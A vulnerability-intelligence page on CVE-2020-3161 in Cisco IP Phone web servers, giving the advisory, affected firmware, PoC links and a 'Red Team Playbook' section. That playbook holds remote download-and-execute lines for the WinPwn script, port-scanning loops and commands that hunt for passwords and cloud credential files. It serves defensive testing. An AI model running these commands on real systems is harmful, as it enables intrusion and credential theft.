CVE-2020-3161
Overview
This vulnerability is a remote code execution and denial of service flaw caused by improper input validation in the HTTP request handling of the embedded web server on Cisco IP Phones. The root cause lies in the web server's failure to sanitize crafted HTTP requests, which are processed without authentication. Affected components include the firmware web server on Cisco IP Phone models 8851 and 8865 across multiple firmware versions.
Vulnerability Description
A vulnerability in the web server for Cisco IP Phones could allow an unauthenticated, remote attacker to execute code with root privileges or cause a reload of an affected IP phone, resulting in a denial of service (DoS) condition. The vulnerability is due to a lack of proper input validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web server of a targeted device. A successful exploit could allow the attacker to remotely execute code with root privileges or cause a reload of an affected IP phone, resulting in a DoS condition.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code with root privileges on affected Cisco IP Phones or cause the devices to reload, resulting in a denial of service condition. No user interaction or credentials are required to trigger the exploit. This enables full system compromise, allowing attackers to control or disrupt telephony services, potentially impacting business communications and operational continuity.
Solution
Cisco has released security updates addressing this vulnerability in affected IP phone firmware versions. Administrators should apply the patches detailed in Cisco Security Advisory cisco-sa-voip-phones-rce-dos-rB6EeRXs, which covers firmware updates for Cisco IP Phone 8851 and 8865 models. The advisory provides version-specific remediation instructions and recommends immediate deployment of these firmware updates to mitigate the issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability affecting the web server of Cisco IP Phones stems from inadequate input validation of HTTP requests. This flaw allows an unauthenticated remote attacker to craft malicious HTTP requests that can lead to remote code execution with root privileges or trigger a reload of the affected device. The root cause of this vulnerability lies in the failure to properly sanitize input, which is a common oversight in web applications and services. When an attacker sends a specially crafted request, the web server processes it without sufficient checks, enabling the execution of arbitrary code or causing the device to crash, thereby resulting in a denial of service (DoS) condition.
Exploitation of this vulnerability can occur through various attack vectors. An attacker may leverage network access to the targeted IP phone's web server, which is typically exposed to the local network or, in some cases, the internet. By sending a maliciously crafted HTTP request, the attacker can exploit the input validation flaw. Given that the devices are often used in enterprise environments for communication, the potential for exploitation is significant. Attack scenarios could involve an attacker gaining access to sensitive information, intercepting communications, or disrupting business operations by rendering the devices inoperable.
The real-world impact of this vulnerability can be severe, particularly for organizations relying on Cisco IP Phones for their communication infrastructure. A successful exploit could lead to unauthorized access to sensitive data, including voice communications and user credentials. Furthermore, the ability to execute code with root privileges means that an attacker could install malware or create backdoors for future access. The resulting denial of service could disrupt business operations, leading to financial losses, reputational damage, and potential regulatory repercussions, especially in sectors that require stringent data protection measures.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware on affected Cisco IP Phones is crucial, as vendors typically release patches to address known vulnerabilities. Network segmentation can also help limit exposure by isolating IP phones from untrusted networks. Intrusion detection systems (IDS) can be deployed to monitor network traffic for signs of exploitation attempts, while firewalls should be configured to restrict access to the web server of the IP phones. Additionally, conducting regular security assessments and penetration testing can help identify vulnerabilities before they can be exploited by malicious actors.
In conclusion, the vulnerability in the web server of Cisco IP Phones presents a significant threat to organizations that utilize these devices for communication. The potential for remote code execution and denial of service underscores the importance of robust security practices, including timely updates, network segmentation, and proactive monitoring. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare to defend against potential exploits and safeguard their communication infrastructure.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2020-3161, rising by over 12% to a current level that places it near the 99th percentile of exploit likelihood. This upward trend, coupled with the recent emergence of publicly available proof-of-concept exploits targeting Cisco IP Phones, signals growing adversary interest and capability to leverage this vulnerability. Although ransomware campaigns have not been definitively linked to this CVE, the association with the Akira group underscores the potential for integration into broader attack chains. The heightened EPSS score and expanding exploit toolkit elevate the threat posture, indicating that threat actors are increasingly poised to conduct impactful remote code execution or denial-of-service attacks against affected devices. Defenders should recognize this shift as a significant escalation in risk, reflecting both increased exploitability and adversary focus within the operational environment.
Affected Products (31)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Ip Phone 8865 Firmware | 10.3\(1\)es14 |
cpe:2.3:o:cisco:ip_phone_8865_firmware:10.3\(1\)es14:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8865 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_8865_firmware:11.0\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8865 Firmware | 11.0\(5\)sr1 |
cpe:2.3:o:cisco:ip_phone_8865_firmware:11.0\(5\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8851 Firmware | 10.3\(1\)es14 |
cpe:2.3:o:cisco:ip_phone_8851_firmware:10.3\(1\)es14:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8851 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_8851_firmware:11.0\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8851 Firmware | 11.0\(5\)sr1 |
cpe:2.3:o:cisco:ip_phone_8851_firmware:11.0\(5\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7841 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_7841_firmware:11.0\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7821 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_7821_firmware:11.0\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8811 Firmware | 10.3\(1\)es14 |
cpe:2.3:o:cisco:ip_phone_8811_firmware:10.3\(1\)es14:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8811 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_8811_firmware:11.0\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8811 Firmware | 11.0\(5\)sr1 |
cpe:2.3:o:cisco:ip_phone_8811_firmware:11.0\(5\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8861 Firmware | 10.3\(1\)es14 |
cpe:2.3:o:cisco:ip_phone_8861_firmware:10.3\(1\)es14:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8861 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_8861_firmware:11.0\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8861 Firmware | 11.0\(5\)sr1 |
cpe:2.3:o:cisco:ip_phone_8861_firmware:11.0\(5\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8845 Firmware | 10.3\(1\)es14 |
cpe:2.3:o:cisco:ip_phone_8845_firmware:10.3\(1\)es14:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8845 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_8845_firmware:11.0\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8845 Firmware | 11.0\(5\)sr1 |
cpe:2.3:o:cisco:ip_phone_8845_firmware:11.0\(5\)sr1:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 7861 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_7861_firmware:11.0\(1\):*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8841 Firmware | 10.3\(1\)es14 |
cpe:2.3:o:cisco:ip_phone_8841_firmware:10.3\(1\)es14:*:*:*:*:*:*:*
|
|
|
Cisco | Ip Phone 8841 Firmware | 11.0\(1\) |
cpe:2.3:o:cisco:ip_phone_8841_firmware:11.0\(1\):*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Cisco IP Phone 11.7 - Denial of service (PoC) | Jacob Baines | dos | hardware | - | View |
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
abood05972/CVE-2020-3161
Cisco IP Phone 11.7 - Denial of Service (PoC)
|
abood05972 | 0 | 0 | 2020-12-31 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-3161 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/157265/Cisco-IP-Phone-11.7-Denial-Of-Service.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-3161 |